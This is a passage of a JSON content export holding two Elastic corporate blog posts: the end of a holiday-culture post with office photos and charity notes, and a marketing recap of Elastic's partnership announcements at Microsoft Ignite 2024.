75%"}}},{"image":{"image":{"uid":"blt0959eb2066e56d2b","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-12-12T00:52:28.723Z","created_by":"blte369ea3bcd6ac892","file_size":"159477","filename":"BangaloreOffice.jpeg","parent_uid":null,"tags":[],"title":"BangaloreOffice.jpeg","updated_at":"2024-12-12T00:52:28.723Z","updated_by":"blte369ea3bcd6ac892","publish_details":{"time":"2024-12-12T15:00:01.898Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0959eb2066e56d2b/675a33cc333a86c0f5c20b10/BangaloreOffice.jpeg"},"_metadata":{"uid":"cs245d4188d760adf3"},"caption_l10n":"India","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"image":{"image":{"uid":"bltfb2904c9e97ada2a","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-12-12T00:52:50.345Z","created_by":"blte369ea3bcd6ac892","file_size":"2847026","filename":"BerlinCluster.jpg","parent_uid":null,"tags":[],"title":"BerlinCluster.jpg","updated_at":"2024-12-12T00:52:50.345Z","updated_by":"blte369ea3bcd6ac892","publish_details":{"time":"2024-12-12T15:00:01.868Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltfb2904c9e97ada2a/675a33e2dc7d4184971c33f2/BerlinCluster.jpg"},"_metadata":{"uid":"cse503f636a97d644d"},"caption_l10n":"Germany","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"image":{"image":{"uid":"bltd3436556607795ca","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-12-12T00:53:18.412Z","created_by":"blte369ea3bcd6ac892","file_size":"898794","filename":"CopenhagenCluster.jpg","parent_uid":null,"tags":[],"title":"CopenhagenCluster.jpg","updated_at":"2024-12-12T00:53:18.412Z","updated_by":"blte369ea3bcd6ac892","publish_details":{"time":"2024-12-12T15:00:01.782Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd3436556607795ca/675a33fe4af80bad9bf0d1c5/CopenhagenCluster.jpg"},"_metadata":{"uid":"csec092dedea9f53b7"},"caption_l10n":"Denmark","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"image":{"image":{"uid":"blt6eef40cb2edf3357","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-12-12T00:54:07.349Z","created_by":"blte369ea3bcd6ac892","file_size":"899198","filename":"JapanOffice.jpg","parent_uid":null,"tags":[],"title":"JapanOffice.jpg","updated_at":"2024-12-12T00:54:07.349Z","updated_by":"blte369ea3bcd6ac892","publish_details":{"time":"2024-12-12T15:00:01.801Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6eef40cb2edf3357/675a342f3f552a5b23e3efe3/JapanOffice.jpg"},"_metadata":{"uid":"cs9aaa768c30c4e662"},"caption_l10n":"Japan","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"image":{"image":{"uid":"blt77f82b825be06166","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-12-12T00:54:44.137Z","created_by":"blte369ea3bcd6ac892","file_size":"9045864","filename":"LondonOffice.jpg","parent_uid":null,"tags":[],"title":"LondonOffice.jpg","updated_at":"2024-12-12T00:54:44.137Z","updated_by":"blte369ea3bcd6ac892","publish_details":{"time":"2024-12-12T15:00:01.847Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt77f82b825be06166/675a3454f0d612cb78b068d9/LondonOffice.jpg"},"_metadata":{"uid":"cs54ff42fa1916dc2d"},"caption_l10n":"England","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"image":{"image":{"uid":"bltd8c206c9d263ea8d","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-12-12T00:54:46.396Z","created_by":"blte369ea3bcd6ac892","file_size":"1889748","filename":"ParisOffice.jpg","parent_uid":null,"tags":[],"title":"ParisOffice.jpg","updated_at":"2024-12-12T00:54:46.396Z","updated_by":"blte369ea3bcd6ac892","publish_details":{"time":"2024-12-12T15:00:01.918Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd8c206c9d263ea8d/675a345619cfd5dd7af0af84/ParisOffice.jpg"},"_metadata":{"uid":"csf58e44f7aaaf57b9"},"caption_l10n":"France","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"image":{"image":{"uid":"blt4a780b9c5d468a1b","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-12-12T00:54:53.325Z","created_by":"blte369ea3bcd6ac892","file_size":"2188574","filename":"SingaporeOffice.jpg","parent_uid":null,"tags":[],"title":"SingaporeOffice.jpg","updated_at":"2024-12-12T00:54:53.325Z","updated_by":"blte369ea3bcd6ac892","publish_details":{"time":"2024-12-12T15:00:01.882Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4a780b9c5d468a1b/675a345d7fae94e6f4bef832/SingaporeOffice.jpg"},"_metadata":{"uid":"cs7dbd07e207b8c4e6"},"caption_l10n":"Singapore","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csb1527cd358d3f3ce"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eTo further our worldwide connection, Elasticians can add a recipe to the\u003c/span\u003e\u003cspan style=\"color: rgb(9, 9, 9);font-size: 12pt;\"\u003e Elastic eCookbook, which celebrates our diverse teams through food.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(9, 9, 9);font-size: 12pt;\"\u003eAnd, in the spirit of giving, the workplace experience team has organized giving opportunities to support various charities in cities around the world. From creating Cards for Kindness to support those at risk of social isolation to partnering with organizations like Toys for Tots, our team embraces the joy of giving.\u003c/span\u003e\u003cbr /\u003e\u003cbr /\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe holidays are always a special time of year. It’s a time for celebration and reflection. As we bring this year to a close, it’s important to us to celebrate our Elasticians — the people who make Elastic, Elastic.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWishing you all a joyful holiday season!\u003cbr /\u003e\u003cbr /\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003eInterested in joining Elastic? Check out our \u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/careers/?baymax=web\u0026elektra=culture--decemberfest-elastic-holiday-celebration\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eopen roles\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003e.\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u0026nbsp; \u003cbr /\u003e\u003cbr /\u003e\u003cem\u003eThis blog was originally published on December 15, 2023.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9cca9c47438eb676"}}}],"publish_date":"2024-12-12","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[{"uid":"blt0414045bd4e12b0e","_content_type_uid":"tags_culture"},{"uid":"blt3a53ab5d9bed00eb","_content_type_uid":"tags_culture"}],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blte0da50ac123d4d0b","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2023-12-14T22:00:29.037Z","created_by":"blte369ea3bcd6ac892","file_size":"164264","filename":"decemberfest-blog-image-720x420-2x.png","parent_uid":null,"tags":[],"title":"decemberfest-blog-image-720x420-2x.png","updated_at":"2023-12-14T22:00:29.037Z","updated_by":"blte369ea3bcd6ac892","publish_details":{"time":"2023-12-15T15:00:00.429Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte0da50ac123d4d0b/657b7afd7cafa3c370de7f9e/decemberfest-blog-image-720x420-2x.png"},"title":"Decemberfest is here! How we celebrate the holidays at Elastic","title_l10n":"Decemberfest is here! How we celebrate the holidays at Elastic","updated_at":"2024-12-12T01:16:12.244Z","updated_by":"blte369ea3bcd6ac892","url":"/blog/culture-decemberfest-elastic-holiday-celebration","publish_details":{"time":"2024-12-12T15:00:01.767Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blted797809aab6f922","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic’s partnership with Microsoft is stronger than ever. This blog summarizes how we showcased our latest advancements and integrations at Microsoft Ignite as well as our joint achievements during 2024.","author":["blt5e2c089af3960f86","blt3f02e05e41c2a581","blt10dedbc6ca0c0503","blt9d6e81ff1a69cdfa","blt39dee51344f15656"],"category":["blt0c9f31df4f2a7a2b"],"created_at":"2024-12-11T19:24:02.856Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd83bec9aa15061e9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLast month, Elastic was thrilled to participate in Microsoft Ignite to showcase our latest advancements and integrations with Microsoft in service of our joint customers. Ignite is Microsoft's largest annual conference. Attracting more than 200,000 people online and 14,000 in-person attendees, this event allowed us to closely engage with customers and the vast Microsoft partner ecosystem in a meaningful way. As \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-wins-2024-microsoft-us-partner-of-the-year\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMicrosoft’s US Partner of the Year\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, it was the perfect opportunity to celebrate the culmination of our joint investment, innovation, and co-engineering with Microsoft and how our partnership helps customers develop and scale their generative AI (GenAI) capabilities.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThis blog highlights our top moments at Microsoft Ignite and our collaboration with Microsoft to better serve customers in 2024.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elastic at Microsoft Ignite 2024","_metadata":{"uid":"csa74ffa69b43a81ed"},"header_style":"H2","paragraph_l10n":""},{"title_l10n":"Better together","_metadata":{"uid":"cs5f456313a1f86a3b"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic and Microsoft have been strategically aligned since 2017 to bring Elastic’s more than 10 years of R\u0026amp;D in search and AI to Microsoft users through \u003c/span\u003e\u003ca href=\"https://azuremarketplace.microsoft.com/en/marketplace/apps/elastic.ec-azure-pp?tab=overview\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Search (Elasticsearch) – An Azure Native ISV Service\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. With over 40 \u003c/span\u003e\u003ca href=\"https://www.elastic.co/integrations/data-integrations\"\u003e\u003cspan style='font-size: 12pt;'\u003eintegrations with Microsoft technologies\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and a frictionless marketplace experience, our partnership is grounded in helping customers accelerate their cloud and AI journey.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe had numerous conversations where we showcased how our users can build transformative applications, proactively resolve observability issues, and address complex security threats — all with the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/partners/microsoft-azure\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Search AI Platform on Microsoft Azure\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs86e564c3ad8d4fdc"}}},{"image":{"image":{"uid":"bltb31a5d5dc5fb0f54","_version":1,"title":"image1.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-11T19:27:03.477Z","updated_at":"2024-12-11T19:27:03.477Z","content_type":"image/png","file_size":"2916228","filename":"image1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-11T19:38:24.449Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb31a5d5dc5fb0f54/6759e787197eca3188cdf6f7/image1.png"},"_metadata":{"uid":"cs8ed904d443cf7ecd"},"caption_l10n":"","alt_text_l10n":"1 - elastic sign","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Key moments","_metadata":{"uid":"cs9303edeba2dc4c0c"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAnnouncements\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAzure solution certification: A new benchmark for quality and integration\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe most recent landmark achievement in our collaboration is \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elasticsearch-certified-software-solution-microsoft-azure\"\u003e\u003cspan style='font-size: 12pt;'\u003eour recent Azure solution certification\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. This certification underscores our commitment to providing trusted, high-quality solutions that integrate seamlessly with Microsoft Azure. With this certification, customers can be confident in deploying Elastic solutions within their Microsoft Azure environments knowing that they meet high security, reliability, and performance standards.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eServe more with Serverless: Elastic Cloud Serverless coming soon on Microsoft Azure\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe’re excited to share that \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-cloud-serverless-microsoft-azure\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud Serverless will soon be available on Microsoft Azure\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e! This new offering provides all the power of Elastic’s solutions in a fully managed, serverless experience. Built on a new \u003c/span\u003e\u003ca href=\"https://www.elastic.co/cloud/serverless/search-ai-lake\"\u003e\u003cspan style='font-size: 12pt;'\u003eSearch AI Lake\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e architecture, it combines vast storage and low latency querying at scale with all of the strengths of Elasticsearch’s AI and search capabilities.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAnnouncing the Microsoft Semantic Kernel Elasticsearch connector\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe announced the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/microsoft-semantic-kernel-elasticsearch\"\u003e\u003cspan style='font-size: 12pt;'\u003eintegration of Microsoft Semantic Kernel with Elasticsearch\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to enhance capabilities in building intelligent applications that use advanced semantic search and AI functionalities. This collaboration aims to simplify the development of sophisticated AI solutions, allowing users to handle and analyze complex data sets efficiently.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e0 to 60 with Elastic AI Assistant for Search and Azure OpenAI\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe also introduced the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-ai-assistant-for-search-azure-openai\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Assistant for Search\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, which integrates Azure OpenAI Service to enhance search experiences with natural language processing and AI-powered insights. This integration enables users to interact more naturally with their data and derive actionable intelligence from vast data sets, improving decision-making and operational efficiency.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eBreakout sessions\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/span\u003e\u003ca href=\"https://ignite.microsoft.com/en-US/sessions/THRFP783?source=sessions\"\u003e\u003cspan style='font-size: 12pt;'\u003eRevolutionize conversational AI\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003edemonstrated\u003c/span\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/integrations/microsoft\"\u003e\u003cspan style='font-size: 12pt;'\u003eintegrations with Azure OpenAI Service\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e to enhance conversational AI by providing large language models (LLMs) with contextual business data, resulting in richer and more relevant user interactions.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs77a0c73c223d74b2"}}},{"image":{"image":{"uid":"blt3253b2713ca0c03f","_version":1,"title":"Screenshot 2024-12-11 at 2.27.46 PM.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-11T19:27:58.550Z","updated_at":"2024-12-11T19:27:58.550Z","content_type":"image/png","file_size":"1167838","filename":"Screenshot_2024-12-11_at_2.27.46_PM.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-11T19:38:24.410Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3253b2713ca0c03f/6759e7be4f07d38703f32c82/Screenshot_2024-12-11_at_2.27.46_PM.png"},"_metadata":{"uid":"csd6aa3ac815c35f4e"},"caption_l10n":"","alt_text_l10n":"2 - hemant","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs08e3baf32de25aa0"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://ignite.microsoft.com/en-US/partners/4ed49bdc-f3ea-4124-bc53-1df63ee3363a\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003eExplore GenAI for customer support with Elastic Support Assistant\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e showcased how Elastic is using Azure OpenAI to provide a generative AI-powered chat experience designed to answer a wide range of product questions across all Elastic products to enhance the customer experience.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic joined Microsoft in the session \u003c/span\u003e\u003ca href=\"https://ignite.microsoft.com/en-US/sessions/BRK342?source=sessions\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003eTransforming Co-Selling with Microsoft: A New Era of Collaboration\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, which\u003c/span\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e focused on helping partners understand how enhancing collaboration and optimizing joint efforts with Microsoft can drive \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecustomer success\u003c/span\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003eElastic co-presented with Microsoft for a session on \u003c/span\u003e\u003ca href=\"https://ignite.microsoft.com/en-US/sessions/BRK126?source=sessions\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003eProductive AI with Semantic Kernel\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, demonstrating how .NET developers can use the Elasticsearch vector database in their applications.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs1aa4339a41c9a15f"}}},{"image":{"image":{"uid":"bltdf79e277566f2c4d","_version":1,"title":"Screenshot 2024-12-11 at 2.28.46 PM.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-11T19:29:15.757Z","updated_at":"2024-12-11T19:29:15.757Z","content_type":"image/png","file_size":"3309219","filename":"Screenshot_2024-12-11_at_2.28.46_PM.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-11T19:38:24.496Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdf79e277566f2c4d/6759e80b4e76753e0eeef9ea/Screenshot_2024-12-11_at_2.28.46_PM.png"},"_metadata":{"uid":"cs6258f67358c5fd3e"},"caption_l10n":"","alt_text_l10n":"3 - ai innovation presentation","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"The best of Elastic and Microsoft in 2024","_metadata":{"uid":"cs5a7e39989ea536b7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eMicrosoft US Partner of the Year: A testament to our synergy\u003c/strong\u003e\u003c/span\u003e\u003cbr /\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIn a testament to our deep collaboration and commitment to customer success, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-wins-2024-microsoft-us-partner-of-the-year\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic was honored with the Microsoft US Partner of the Year award\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe US Partner of the Year award recognized Elastic for delivering impactful solutions and services on Microsoft Azure, offering experiences powered by the Elastic Search AI Platform to our shared customers and accelerating business value through Microsoft Azure.\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e As we reflect on this accomplishment, we remain dedicated to pushing the boundaries of what our technologies can achieve together.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa2b5e27f4a4873ca"}}},{"image":{"image":{"uid":"blt803e91f8a834c9c2","_version":1,"title":"image5.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-11T19:29:41.881Z","updated_at":"2024-12-11T19:29:41.881Z","content_type":"image/png","file_size":"350953","filename":"image5.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-11T19:38:24.571Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt803e91f8a834c9c2/6759e8254657c8b28fd1da22/image5.png"},"_metadata":{"uid":"cscc2175be83e851c8"},"caption_l10n":"","alt_text_l10n":"4 - we won!","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cse7e92641762af242"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eKey announcements from Elastic and Microsoft in 2024\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eOpen inference API enhancements:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Expanded API functionality with support for:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAzure AI Studio:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Easier AI project setup and management\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eChat completions:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Build conversational AI solutions seamlessly\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEmbeddings:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Improved data representation for AI models\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eLLM observability for Azure OpenAI:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Introduced new observability tools tailored for large language models on Azure.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAzure OpenAI connector configuration:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Makes it simpler to integrate Elasticsearch with Azure OpenAI and streamlines workflows for developers.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eElasticsearch as a vector database within Microsoft solutions\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePrivate preview of Elasticsearch as a vector database: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eEmpowers developers to build AI solutions on their data for Azure OpenAI Studio.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eGitHub Copilot integration: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eImproves debugging and performance monitoring for developers with demonstrated ability to bring observability insights from the Elastic AI Assistant into GitHub Copilot.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eM365 Copilot: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eShowcased how M365 Copilot can be extended to bring observability insights from Elastic's AI Assistant into the M365 experience.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eKey joint events\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe held nine community-focused meetups to help users understand key use 